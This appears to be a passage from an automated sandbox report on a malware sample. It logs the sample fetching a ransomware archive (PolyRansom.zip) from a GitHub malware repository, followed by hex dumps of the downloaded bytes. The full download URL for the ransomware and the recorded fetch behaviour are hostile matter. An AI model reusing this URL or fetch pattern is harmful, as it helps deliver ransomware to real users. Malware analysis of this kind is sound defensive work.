                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                41140.82.121.4443192.168.2.349719C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:53 UTC2411INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:53 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:53 UTC2412INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                42192.168.2.349720185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:53 UTC2414OUTGET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                43185.199.108.133443192.168.2.349720C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:53 UTC2414INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 133759
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "c0c6af3e39ace2d58d00154f6e809181a5c813ca80bbf20f38837a99f8056014"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0800:540D:F52AAF:104AFB9:63359348
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:53 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6942-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455734.876828,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: d9c6d2a6db2ca45b41fd3c8486aa00319ce9ae2e
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:53 GMT
                                                                                                                                                Source-Age: 237
                                                                                                                                                2022-09-29 12:48:53 UTC2415INData Raw: 50 4b 03 04 14 00 01 00 08 00 d7 0a 79 45 34 43 fb 93 c7 09 02 00 00 70 03 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 6f 6c 79 52 61 6e 73 6f 6d 2e 65 78 65 58 ef 05 c0 b6 8a bd fa 25 51 13 b9 f0 ae cd 11 df 91 dc 43 09 90 1b b5 9d 5d 56 12 5c 94 0e ff 03 d7 23 cf 58 8f c9 fc 7a ca d0 4b c3 a3 27 ee 75 4b 94 c3 a8 37 cb c7 96 47 64 25 16 5f 75 8b 47 35 1c ec 30 cf b0 1c 29 8d 4e 7a b2 68 9f 1a b9 f2 b5 cf 25 fc 5f cb e5 54 45 19 d1 c3 7f 29 0e 9a 48 e3 c3 db bf d1 58 a6 62 90 28 e7 25 5d 5d 44 e2 fd ca 22 88 a8 30 1b 7c 35 9b ac 29 b6 47 ea 2d 68 27 71 fa 3a dc b6 a1 8c 7d 62 f8 31 e2 cb 11 3a ce b9 5e a4 0e 64 ef 92 64 9d 74 fb c5 0a 39 83 f1 e4 aa 69 59 2b df 89 eb ae a0 07 94 80 66 94 95 09 21 bb 66 6e af 73 6b ff d8 aa 55 47 28 e9 d7 86 82 af
                                                                                                                                                Data Ascii: PKyE4CpEndermanch@PolyRansom.exeX%QC]V\#XzK'uK7Gd%_uG50)Nzh%_TE)HXb(%]]D"0|5)G-h'q:}b1:^ddt9iY+f!fnskUG(
                                                                                                                                                2022-09-29 12:48:53 UTC2416INData Raw: 17 33 ff c8 39 47 fa ee c0 ad ea dc 38 f8 ca 65 24 cf 8a 2b c5 cb f0 93 b0 18 83 98 05 b8 3f 55 28 df a7 92 90 48 63 1c a0 ad 30 71 3e d5 16 f9 a6 5c 20 0c 28 f2 78 b4 5b f5 38 cd 49 b0 e4 1e 4a 2e e8 98 c3 c7 72 d8 4b ad c6 fc 30 05 aa 65 00 27 a1 8e 77 33 05 dc 07 4f 71 ba 48 a8 1e ed ea 11 5e c8 4c f1 45 3b 4b 58 2c e8 d3 77 12 7c 39 e9 f9 04 7c 9b 2b 04 3e 6e 86 73 4e 63 64 c9 ed 8a 88 e7 f5 61 6d 26 7b 79 07 2f d8 35 b3 d0 42 09 2d 06 d0 21 18 b6 28 e9 65 3f e2 fd f8 09 fd 9f d7 ed 2e 94 a5 7d 9c c7 00 88 56 76 ca f7 10 42 f2 5b d5 9a e1 40 59 83 65 c4 07 4a 6d 0d a2 fc 1a b9 5c 9a 94 c3 1d 80 82 d3 d2 58 e9 e6 c1 fb b2 2b 87 05 ee 54 c5 15 da f8 68 7d c5 de 0f 44 33 a4 27 dd 85 43 4c 6c 43 a5 c6 b4 7a d1 47 68 e3 12 99 3d 46 1b 14 a2 4a de 25 5e 89
                                                                                                                                                Data Ascii: 39G8e$+?U(Hc0q>\ (x[8IJ.rK0e'w3OqH^LE;KX,w|9|+>nsNcdam&{y/5B-!(e?.}VvB[@YeJm\X+Th}D3'CLlCzGh=FJ%^
                                                                                                                                                2022-09-29 12:48:53 UTC2417INData Raw: bd f7 c9 f4 a3 b7 91 79 2e c3 11 2b 6e 64 1a 4b ea 6c 91 b8 c3 16 33 e8 77 c9 26 f6 aa 9c e4 5c 8b b0 ad a6 07 e1 9c 46 01 f4 f4 3d 7c 84 81 84 bd e4 25 ee b9 e6 b7 ea 46 c7 48 df 0c f2 a8 8d 48 2b d4 a6 b6 be 2f 8f b7 54 ed 32 64 24 bb b6 6f 0c f9 64 5f f4 f0 d0 f5 8b cb b1 41 2e ba 3b bb e6 08 72 24 c7 bd 52 82 ec e6 db 5d fe af bd 52 6c c0 40 40 c6 8e ec 88 a6 30 2b 7d bf 4e 78 6a bf a7 5d 12 c7 80 00 95 c3 cb 75 0b e0 a4 cd 03 03 23 33 bc 68 bd db db 96 93 55 6f 65 85 39 c8 bb 46 7e 20 07 97 3f b4 9d 62 24 65 19 1d 2a 0f 6b 2d 5e b6 16 ab d2 54 d4 ad 39 00 30 6b 38 cb 5c 9e 9c 59 33 7a 6c f4 cf 56 f5 15 19 36 ee 69 3e 4b 27 5b 83 32 3f 85 2d d4 45 97 9b eb 70 66 93 70 86 9c a1 75 c3 1a 30 71 e0 1c 83 3a d5 fe b2 95 a8 8a bf 92 85 94 b3 24 ae f3 b3 c2
                                                                                                                                                Data Ascii: y.+ndKl3w&\F=|%FHH+/T2d$od_A.;r$R]Rl@@0+}Nxj]u#3hUoe9F~ ?b$e*k-^T90k8\Y3zlV6i>K'[2?-Epfpu0q:$
                                                                                                                                                2022-09-29 12:48:53 UTC2419INData Raw: af 2f 92 fa 0b 8a 59 a4 6f 60 d1 13 9c b4 d5 e0 b7 69 9e ff 76 40 97 6e 76 11 06 68 4d 66 6e ed 50 b6 b9 dd fe 17 5d d2 d4 26 1f f4 fa 64 c5 02 49 f1 47 27 02 90 d9 96 37 64 b4 69 c6 0a 3e f4 a9 b4 01 b6 9e 1e c4 1b 50 71 70 f1 b7 5b b4 a7 27 f7 22 c2 3b 90 3f c4 03 c9 07 14 8a c2 6c 28 20 63 99 e2 43 fd f0 3d a9 84 d7 e7 46 1b 81 0d d8 28 7b 24 6b ad dc 66 2b 5d 77 0b 9c f2 d5 1e da 6a ab 0a 12 03 29 8f 21 78 36 9e 5a 15 31 b4 e1 d8 08 4a c0 92 8e 09 62 2f 28 9f 31 29 a3 bf a7 f0 f7 e6 3a c1 f8 09 1e c7 02 5a 03 89 8a 7a 54 b1 96 85 54 7d 57 09 4d 85 2d 00 0e fc 5f db 3a 2d 97 cc c0 60 9e f5 bd 40 d3 53 71 14 eb 51 fb 6f 64 b4 cb c1 6a 71 69 71 95 40 4f 59 25 9e 5d 35 7a ea 15 ca be 91 09 c2 d3 0e cc 89 aa 66 6d cd 7b 0a 19 8d 8f 92 b4 7f 1e 0c 6e fd ef
                                                                                                                                                Data Ascii: /Yo`iv@nvhMfnP]&dIG'7di>Pqp['";?l( cC=F({$kf+]wj)!x6Z1Jb/(1):ZzTT}WM-_:-`@SqQodjqiq@OY%]5zfm{n
                                                                                                                                                2022-09-29 12:48:53 UTC2420INData Raw: 36 ad 6f 8f d3 b1 7c 89 65 8d da b4 42 c8 e6 93 75 55 84 96 48 65 bd b9 5c 46 96 d7 72 6e 94 7b 79 95 ba 64 46 9e 00 5e f1 93 09 11 c2 a4 f5 5d 96 4e be 29 2b 8b 67 48 3f 2d c8 04 7f a6 65 d5 13 e2 80 cd 4f 6d ae 8c cd 71 bb b4 33 97 ce 27 1d 51 c9 02 6c 7e a0 3f c3 cb a8 f8 29 b0 e0 72 d6 de df 20 1f 0a 38 2e ea 62 4e 3c f1 ec 7c b5 d0 33 c6 01 9f 65 1d 6a 8c ed c3 23 1d 29 68 01 e4 d9 8e a7 a6 0d 80 0c 31 d7 28 92 f2 f1 61 d4 dc 79 20 ac 2c 3a 4a ee 15 c0 be 79 32 78 09 ad 2e 36 9e bf a6 1a bb 27 b3 8b 97 6c e3 61 c0 c5 66 a7 61 9b 22 87 53 ea 7e 4e c6 a4 b1 69 b2 9c 21 c4 b3 7d 8e ea 52 86 5b f6 36 df 94 5d 2f 82 f6 60 e9 c6 1c 71 d5 79 53 a0 9b 3f 74 33 3a 77 6e b8 58 ef cb 45 39 02 b2 6d cd a0 a6 b5 39 8c 7f e5 d7 ea 0e f4 c0 dd 87 30 ea f9 2b a4 92
                                                                                                                                                Data Ascii: 6o|eBuUHe\Frn{ydF^]N)+gH?-eOmq3'Ql~?)r 8.bN<|3ej#)h1(ay ,:Jy2x.6'lafa"S~Ni!}R[6]/`qyS?t3:wnXE9m90+
                                                                                                                                                2022-09-29 12:48:53 UTC2421INData Raw: 88 8d 3b 50 8e 4f a5 ce 06 b4 a0 28 e3 90 11 fd a0 db 69 5c df 92 a2 d7 58 4f f8 f4 55 60 6f b6 4d a6 49 1b f1 d9 cf 7f b8 3f a2 74 b6 8a 02 33 3d d3 cb 46 64 57 02 f3 f4 78 04 d0 60 30 f3 c6 93 02 05 c9 74 c0 0d b2 2b f1 42 2c c0 da 6d a6 67 ff a1 f5 e7 fd da 55 1f 0e e0 15 26 a7 55 43 f4 22 31 e5 9e 50 13 a4 f5 f9 1f 36 21 5d 0c 45 0e 70 0a c3 f6 3e 14 b0 65 b3 b7 a8 f4 d1 a6 be 9a 1a 40 c6 3d 06 81 60 f5 7b 32 81 60 e7 04 d1 3f 0e 50 80 f7 5d 82 0f 21 3d e1 3b cc a5 40 2f 86 4d 41 09 7f 71 f0 c3 1c 98 29 95 53 49 ae fb 9c e3 91 0d fe 5d d6 bd 67 49 f2 39 4b e5 29 bb d9 02 63 3e ed bf ba 32 85 96 68 4d 19 8d 4e a7 37 13 b7 f4 74 cc 77 10 a1 5f f3 69 9a bc e7 84 d8 e5 90 91 c7 29 64 c4 82 13 d5 2b 4f b9 a9 a7 39 6d 4d ba 61 8c 82 8f c3 01 ae 61 b2 a8 b4
                                                                                                                                                Data Ascii: ;PO(i\XOU`oMI?t3=FdWx`0t+B,mgU&UC"1P6!]Ep>e@=`{2`?P]!=;@/MAq)SI]gI9K)c>2hMN7tw_i)d+O9mMaa
                                                                                                                                                2022-09-29 12:48:53 UTC2423INData Raw: 58 4e 59 50 68 be fa e0 fc dc c5 7d fb 22 db 08 a8 cd 83 fe 14 3b 85 62 f3 9f 8b 2c f8 08 a7 69 e0 39 44 b7 e7 e1 e7 2b af c9 d0 09 eb 96 b8 d1 b0 0e 30 55 e5 35 e8 d1 96 5d 18 8c c4 8b 6b a0 63 97 c0 21 41 19 f2 b7 57 f5 0f d6 44 64 7e f7 5f ba 82 4d ca a9 08 d3 b6 31 ee ad df fe 76 a7 ab 04 f3 36 e5 0d 89 bf 8c a0 00 8c ff 7e 27 c2 13 a6 0f 87 94 5f 75 99 c3 86 2f 12 26 0c b5 a8 ff 6e c5 0f eb 20 be 28 83 38 60 8d 18 bc 8d ab 56 37 76 fe 16 1d 24 fc c3 ff 22 76 53 21 29 7d 6f c9 69 a6 8b e9 35 ef 51 95 bf c2 df da 7f dd 26 f0 4e 7d 8b da 21 98 d2 6a 57 75 87 37 0e 5e b7 f9 32 3c f2 17 fc de 22 65 3f 4c 6d 84 a1 dc 7c 7b 84 05 82 6a 54 79 a8 5f fd a3 e8 b9 67 9f 37 b1 7a a5 4e b0 01 b1 e3 d2 49 4e b6 a1 32 bf 87 e2 77 8b 26 e6 fd f8 ea 88 40 f2 67 31 a7
                                                                                                                                                Data Ascii: XNYPh}";b,i9D+0U5]kc!AWDd~_M1v6~'_u/&n (8`V7v$"vS!)}oi5Q&N}!jWu7^2<"e?Lm|{jTy_g7zNIN2w&@g1
                                                                                                                                                2022-09-29 12:48:53 UTC2424INData Raw: 17 4f 9f 16 79 0e e3 11 02 3c 20 eb 0b ad ec b9 43 6d b0 7d 80 8c 8a c3 5d 96 d3 d9 40 6f 7e 0f 47 88 d7 e7 85 4c 3e 7d 24 92 01 2e 4c 3a 5f 68 df 84 25 c5 93 c2 76 1a 38 2d 7a 2b 46 a7 49 ee 22 c1 88 ac c9 a5 ae 6d e3 30 7d db 13 54 04 b4 f6 7b c6 5c 6a 38 c4 34 20 1e 5d 91 82 80 eb 5e be 6b 6c f4 90 14 d1 3d 15 12 3f 6f 2e 80 f2 7c 36 55 6f 95 10 13 59 9f 60 42 cb 7f fb d0 17 3b aa 8a 0b 33 e2 a0 ad a8 a0 2c aa 1b 45 d0 9e 41 e1 59 7d 76 bf 97 a1 58 d6 e9 8e fb 99 11 91 c4 aa ee 4e 8f 4f 83 7d ef ca e6 6f b0 3f 73 b2 d4 d9 30 7d cf 0e f6 0c 8e d4 63 8f ba f2 f8 2e b0 53 b0 2e 15 1d aa 4d 9a 3c bc 15 a3 72 99 63 b7 42 40 1e ef 55 95 e9 36 00 42 14 8e 79 42 32 c2 65 48 ea e0 48 4d a9 fd bc 1a 7e cb 28 45 00 a9 db f3 d2 7c 22 e9 42 87 f4 a8 84 1f 64 9a 14
                                                                                                                                                Data Ascii: Oy< Cm}]@o~GL>}$.L:_h%v8-z+FI"m0}T{\j84 ]^kl=?o.|6UoY`B;3,EAY}vXNO}o?s0}c.S.M<rcB@U6ByB2eHHM~(E|"Bd
                                                                                                                                                2022-09-29 12:48:53 UTC2425INData Raw: bd e4 3e e9 4f 63 22 01 2d c1 3b 76 92 1a 58 50 43 55 35 a7 7a 03 5e a6 11 56 90 cf 03 15 80 36 77 9a e7 1e 12 ab dc 70 2b 8b cc cc 83 06 4e 04 0f fd fa 69 73 45 20 85 9c 52 e9 83 08 bb 32 42 f8 9b 00 78 e0 8e 44 2f 1a aa 2b 89 a6 ea 52 cb fa 2e 77 25 f8 f6 94 78 9c 77 fb 3a 31 43 ce 3c ce fc 44 a6 79 fd 48 28 ab e1 dd 83 9d e4 1a 09 d1 e1 3f fd 66 75 7c 7b e7 00 a8 41 46 27 89 ce ba e3 69 a1 cb 3d 5e 40 8f b0 cf 22 f0 05 a9 79 47 56 1c 69 5d 89 3c 64 95 2d 82 b4 7d 0e 85 c2 6d ba ea 70 82 16 d2 a3 89 da a8 8f 40 1d 9c a9 0c 68 77 c5 3e 73 a1 f2 b4 5e 9b 17 a2 1c 3e 7f 4a e6 5c d1 98 14 e8 ce 6d 47 cf 8c 00 f8 bf 18 16 39 65 1c bd 32 92 a2 9e ad 41 48 2f 4a bb 9d 9c 52 fa 29 a6 54 34 b2 8e 1a fd d6 4b 10 d9 0b 2d 32 63 cc b3 75 31 2b e5 05 35 c8 97 aa 62
                                                                                                                                                Data Ascii: >Oc"-;vXPCU5z^V6wp+NisE R2BxD/+R.w%xw:1C<DyH(?fu|{AF'i=^@"yGVi]<d-}mp@hw>s^>J\mG9e2AH/JR)T4K-2cu1+5b
                                                                                                                                                2022-09-29 12:48:53 UTC2427INData Raw: 9f ef 66 f3 94 af 4c b3 09 2d ab 0e 4e af 97 cd 23 bd 24 8a a5 9d b2 af 58 33 93 68 cb 5a ec 70 3f eb aa 56 e7 0a 29 b0 cc 2f 25 e4 e4 e7 3f de ec bb ef 17 56 22 a8 75 da 1f b2 81 d8 36 73 d5 cd 75 2c 9a dd a4 f4 cf 13 c7 34 a9 f0 12 db dd 27 fd 16 54 be 21 62 2c ac 9b a5 2e 32 d7 95 73 14 00 c0 89 f1 83 5c 1c c8 6a 6f 21 15 25 e3 b4 ea 01 97 b8 38 e2 d8 65 69 cf 54 dc 30 a2 61 40 30 18 0b 95 09 a9 97 73 47 ac a9 d3 44 fa 3d b9 51 b1 6e 24 60 3b aa c3 0a fb 9a ea fd 46 24 2b ba f5 b1 fa 71 19 22 a4 33 85 c1 bd df 8e b2 b2 55 0e 17 c8 15 1d b2 f7 a4 d1 cd ad de a1 30 a1 ae 69 f1 d2 d4 8a ef 39 e2 d2 42 91 7e 5d d3 b9 5c 95 2a c4 18 88 2c be 50 09 61 6f 9b 7e fb f1 0f 81 d6 16 ac 29 b8 17 b1 b9 a8 e5 84 50 e8 65 d1 e9 0c 6e 78 c7 61 43 fd da 20 1d 99 bd be
                                                                                                                                                Data Ascii: fL-N#$X3hZp?V)/%?V"u6su,4'T!b,.2s\jo!%8eiT0a@0sGD=Qn$`;F$+q"3U0i9B~]\*,Pao~)PenxaC
                                                                                                                                                2022-09-29 12:48:53 UTC2428INData Raw: aa 35 fc ed f9 c6 6c 45 53 3e 65 c2 04 79 94 18 80 5b 5c 47 94 28 b4 16 8b 92 ff f0 e4 e3 08 f2 c5 b2 05 1b 63 f1 11 da a4 07 cd 9c 5c 72 16 40 b0 88 7b 70 a8 cd fc 61 43 63 80 fd 6d 5e ab 74 50 99 9a 89 88 cb 07 73 e2 62 40 9f c6 7f 68 00 24 7e ca b7 53 8b e8 6a a6 3c e3 07 56 a3 96 a6 37 2a 66 14 a8 09 cf 0e 03 59 df 25 da 2c 2c 1a 63 fe ac 67 a3 8c e6 3b 9d 0c 8f 1d 6c 52 4a d2 6d 04 fb 63 8d 31 1a d4 6a 2f e6 e8 42 bd 26 b6 86 79 51 c3 16 07 d0 59 43 b4 0d 06 da bb a8 13 14 d3 61 06 79 2d 6d 32 12 9f 0d 0c 36 16 92 76 5f 8b 17 fa a1 76 77 40 61 e7 26 da 36 67 c0 c1 e9 8a f6 c2 43 b3 39 89 56 a0 9d 2f 69 f8 3d e6 2f 51 c4 5e a2 c7 e6 ad 6d b2 50 8b e1 0b 2e bd 49 84 b2 f0 2b ce 3d 65 13 12 d0 de 76 d3 4a d9 34 c7 5d 13 54 62 ee cb da 03 23 8c b0 2c 20
                                                                                                                                                Data Ascii: 5lES>ey[\G(c\r@{paCcm^tPsb@h$~Sj<V7*fY%,,cg;lRJmc1j/B&yQYCay-m26v_vw@a&6gC9V/i=/Q^mP.I+=evJ4]Tb#,
                                                                                                                                                2022-09-29 12:48:53 UTC2429INData Raw: 30 d8 57 76 4c f0 0a de 96 b8 b8 07 a3 40 fb 59 1f b7 3e 70 b5 a1 b4 9c ad bc a9 23 e6 4e 38 22 6d b6 63 da 85 56 94 1e c1 ed 8b b4 a4 0d 63 c5 db 96 7a e2 54 93 80 0f e9 3d 27 80 c3 f9 d0 6f a8 29 36 05 a1 d5 e4 a4 5b 11 3e 7a dd 31 fa 00 75 5e 5a 44 90 a2 37 e8 ea 28 63 a5 82 fd ec 53 c4 f4 af b0 ba 7e a4 d8 43 1a 68 2c 18 9a 5f bd 70 e6 c2 82 d7 03 c4 9e 3c 70 95 89 fb 0e 21 aa 7e 26 84 2a c1 29 67 4a 24 96 1c fd 9d 71 ec f0 32 35 51 04 7a 26 c1 bd 72 07 f5 a6 f6 ce 72 b6 d6 4f fd a1 42 e3 22 f0 fd 7b ab 46 67 71 9e 14 ed ae 18 f0 3f b3 31 4f d5 7c 4f 64 f3 93 b8 e1 f5 88 2a 03 b0 23 58 7c 28 5b 7c b8 5e 4b c7 ea 6f bd c2 52 ec 9e e5 e1 7e 0b 9b 6f 47 0d 4f 93 82 57 70 c8 1e c4 c1 ad f1 c6 02 3a ba 0a 1b b0 06 fb f7 66 c5 7a 02 0c bb 0d f7 5e c9 9b 9e
                                                                                                                                                Data Ascii: 0WvL@Y>p#N8"mcVczT='o)6[>z1u^ZD7(cS~Ch,_p<p!~&*)gJ$q25Qz&rrOB"{Fgq?1O|Od*#X|([|^KoR~oGOWp:fz^
                                                                                                                                                2022-09-29 12:48:53 UTC2430INData Raw: ce 70 1f b5 d7 1d a3 ba 82 ab 97 46 aa 94 fa 93 f8 cb 88 c8 d9 7e 2c 2c f8 02 23 c4 04 6a 85 ef 1f 1d 95 a2 ff 49 3d 3c f8 2d f0 a9 be 07 6d 9d 83 12 5a 16 65 cd fc 48 45 b6 9c 10 52 55 de 4f 31 ee e6 84 b4 b0 cd 0c ea 61 a6 9e a6 5c 87 bf 97 52 ce aa 81 ea fc 35 8a 7b 94 5b 49 9f 2e 44 ac 35 fa 69 f4 56 79 8d 46 ed 11 8d 8d 30 bb a9 2b 42 98 f0 cf 3b 50 3a d9 0d de cd f3 45 20 00 ea bf c2 ac 13 74 e4 e5 a2 64 59 da f5 ac 2c 54 9a 25 61 8c ab b4 6f a6 03 cc 44 62 ac a7 52 a0 32 d7 fe 54 de 8a 40 70 ce 82 5a 3a 66 72 e1 e0 af 25 f1 1e a8 a7 3d 53 8f ca 0f 8d f9 0a 00 03 0a 82 33 47 1c f3 0c b8 f6 2c 5d 87 87 2c 0b 9b 4a b7 2c f7 db 19 e4 fc 49 b6 8c 6e e5 d9 97 73 b9 c2 40 ef 59 94 69 72 d5 c0 2d f1 f6 4e 95 a9 82 68 55 f8 b4 d9 f7 bf 2b d4 5a 8f 20 9f b3
                                                                                                                                                Data Ascii: pF~,,#jI=<-mZeHERUO1a\R5{[I.D5iVyF0+B;P:E tdY,T%aoDbR2T@pZ:fr%=S3G,],J,Ins@Yir-NhU+Z
                                                                                                                                                2022-09-29 12:48:53 UTC2446INData Raw: 56 5f 9e cf 30 00 ec b8 bd 48 11 f1 69 de 65 46 a4 63 c1 c0 f7 3e 36 cd 0d c2 72 82 9e b1 a6 24 b6 d4 04 58 28 d1 b3 3d 44 16 a0 10 81 8b 0a 0c 94 0b ea 0a 41 a3 72 4b d5 d3 db b4 d9 e4 4f 25 c8 08 15 03 5d 1c 47 18 93 a1 08 d2 f7 14 19 e9 0c cf 8f fe df 0d 26 80 f7 e2 68 99 2c 54 75 bd b1 73 5e 89 aa 4a 35 70 cb 12 dc a2 38 97 2d 44 a5 0a 87 ac 48 ad 5c 41 2b be 96 70 63 cd 28 c5 38 78 4a ab 8e b3 b5 4f 19 c3 3f 46 01 d3 50 8a 23 20 e6 fe e3 0b b0 2e d1 fd 65 de a3 5b 6f 3a bb 03 88 97 30 8e 70 f5 46 f2 4d ba 0b cd 4b b4 13 68 0a 87 ae 7e 4a c7 cd 0b 1a 7a 3c a0 07 e6 e6 60 47 38 ba 4c c5 1f d3 6c 20 6f 47 ba b9 8b c5 ac f6 1c e8 7a 50 bc 52 f0 48 a5 81 27 fa 02 84 99 ab b4 f3 14 d8 3c d6 95 72 8f 46 dd b3 fa 43 41 86 ef 34 06 67 0f ae 83 4d 18 db 12 af
                                                                                                                                                Data Ascii: V_0HieFc>6r$X(=DArKO%]G&h,Tus^J5p8-DH\A+pc(8xJO?FP# .e[o:0pFMKh~Jz<`G8Ll oGzPRH'<rFCA4gM
                                                                                                                                                2022-09-29 12:48:53 UTC2462INData Raw: e8 e4 65 a8 fd 43 bb 6e ca 28 43 c1 da 16 5b 48 22 a8 9f 4d 14 13 dd c0 97 30 20 66 e2 fb 8b f0 33 3b 1b 63 8d 35 4d 0e 20 f5 fb 87 5c 09 4c b9 0a f3 28 a8 b1 97 53 8d 82 86 79 24 64 ad e0 11 e9 cc 71 d5 90 b0 86 4b ab dd fa 15 29 53 4b e3 91 6c 75 7d e6 fc 81 f1 20 ec c3 1e 63 b7 e0 e4 16 82 20 0a 57 ab c2 24 cb f8 ba 5f 61 fc 60 6c 10 d2 22 ea 83 d6 fa 8a cb 77 83 9e 54 4b 16 d3 bd 1f 90 fd 09 e9 8f 96 b3 90 dd e9 e4 1b ce ae 07 53 76 a7 f7 f6 a7 c2 fc e5 92 e8 dd 1e a5 53 94 84 32 c3 fd 8c 09 8e 43 ea a6 e3 70 a6 e5 c6 98 1f e8 bf 9e 57 95 af 35 67 10 e5 bd 48 ec bc 4f 01 1a 2f ef 1f f9 6e 5a af 45 56 76 42 3a 27 76 85 1f 91 34 d3 9b 2a f6 67 4a 7c dd d4 4d a9 33 79 bd a4 f2 9a 6c 30 80 fa ed 68 0a 41 52 d4 0a 7c 61 f3 c3 2a 95 97 f4 ac 9f 2f 94 1a c2
                                                                                                                                                Data Ascii: eCn(C[H"M0 f3;c5M \L(Sy$dqK)SKlu} c W$_a`l"wTKSvS2CpW5gHO/nZEVvB:'v4*gJ|M3yl0hAR|a*/
                                                                                                                                                2022-09-29 12:48:53 UTC2478INData Raw: 60 16 4a fd ee f3 ec 3d e0 14 8f 2b c8 0c 1c 84 cf f4 b7 99 1c 3b 73 08 d2 00 98 d3 bb 89 7a 37 dc d2 46 57 a2 ca 2a b5 6e 15 12 1e d2 a3 18 12 e5 cf 35 26 ea b0 b1 0c ef e2 b7 20 0d 5d 59 c9 86 46 54 8f b8 a3 21 47 83 a5 9f 6c db 5b fc 9d 7f 80 07 e4 74 ef 68 4f 43 2c f6 b5 f1 55 bd fb 62 72 0d df 14 dd e1 40 55 90 fe 9f 28 ff c4 36 c9 e1 19 05 aa 0a ad 45 3c 90 f2 29 04 53 15 e2 7e 94 0d 13 cf 1b a5 fb 4b c4 52 3c 19 ec e5 89 0d f9 18 f4 29 2d 86 fa d3 d6 ad 02 87 0c 21 18 89 ef 77 2e b5 2d 6f 20 96 12 75 6b 66 3e 6a a8 74 d1 d9 73 3d 4f 7d e8 11 6d a4 2c fd ec 7c 8b 7f a3 ea bf 14 df 82 a4 04 29 41 fa fa 7c f8 f1 9c fc 0d e9 26 c7 0c f2 6a 1d 6e d7 2a 8c 10 f7 fc 0c 9e 65 f1 16 a7 9a 8d df 32 29 03 2d bd 60 42 9a f1 dd 60 b7 cf 83 f5 cc f7 df 24 a6 e2
                                                                                                                                                Data Ascii: `J=+;sz7FW*n5& ]YFT!Gl[thOC,Ubr@U(6E<)S~KR<)-!w.-o ukf>jts=O}m,|)A|&jn*e2)-`B`$
